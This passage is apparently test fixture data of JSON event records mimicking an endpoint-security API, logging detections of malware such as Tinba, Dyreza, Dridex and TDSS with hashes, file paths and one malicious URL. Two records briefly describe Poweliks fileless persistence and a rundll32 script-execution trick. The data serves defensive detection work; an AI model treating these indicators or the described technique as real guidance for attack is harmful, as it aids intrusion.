Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053698","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://dak1otavola1ndos.com/h/index.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":222000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053697","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617228531237000,"timestamp":1610705342,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:09:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617228531236865","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\My Documents\\Downloads\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415396303000800,"timestamp":1610705341,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.Variant:Tinba.15hl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705341,"start_date":"2021-01-15T10:09:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"bin.exe","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\Application Data\\default\\bin.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49","sha1":"194ada957926b985653f0400ede75175df6b48be","md5":"c141be7ef8a49c2e8bda5e4a856386ac"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":503000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086401","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Tinba.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Tinba.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256842453221000,"timestamp":1610705336,"timestamp_nanoseconds":643000000,"date":"2021-01-15T10:08:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256842453221429","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256790913614000,"timestamp":1610705324,"timestamp_nanoseconds":631000000,"date":"2021-01-15T10:08:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256790913613876","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256739374006000,"timestamp":1610705312,"timestamp_nanoseconds":619000000,"date":"2021-01-15T10:08:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256739374006323","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256687834399000,"timestamp":1610705300,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:08:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256687834398770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256636294791000,"timestamp":1610705288,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:08:08+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256636294791217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":559000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739226271700,"timestamp":1610705284,"timestamp_nanoseconds":226259000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Poweliks is a fileless click-fraud 
malware variant which resides within the registry. It maintains persistence by creating a registry key that makes use of rundll32 to execute javascript code to read Powershell from the Windows registry, which subsequently executes portable executable code in memory.","short_description":"W32.PoweliksPersistence.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739190653000,"timestamp":1610705284,"timestamp_nanoseconds":190644000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The rundll32 application is designed to run code present in DLLs. 
There is however a case where it can also be used in the same way as MSHTA to execute JavaScript code on the command-line.","short_description":"W32.rundll32RunHTMLApplication.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666334151016000,"timestamp":1610705283,"timestamp_nanoseconds":977000000,"date":"2021-01-15T10:08:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.B1380FD95B-100.SBX.TG","detection_id":"6533666334151016449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":3180,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sh
a1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256584755184000,"timestamp":1610705276,"timestamp_nanoseconds":957000000,"date":"2021-01-15T10:07:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256584755183664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709202491408000,"timestamp":1610705270,"timestamp_nanoseconds":802000000,"date":"2021-01-15T10:07:50+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209764771561000,"timestamp":1610705269,"timestamp_nanoseconds":265000000,"date":"2021-01-15T10:07:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209764771561497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256537510543000,"timestamp":1610705265,"timestamp_nanoseconds":319000000,"date":"2021-01-15T10:07:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256537510543407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":187000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841155","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55722,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
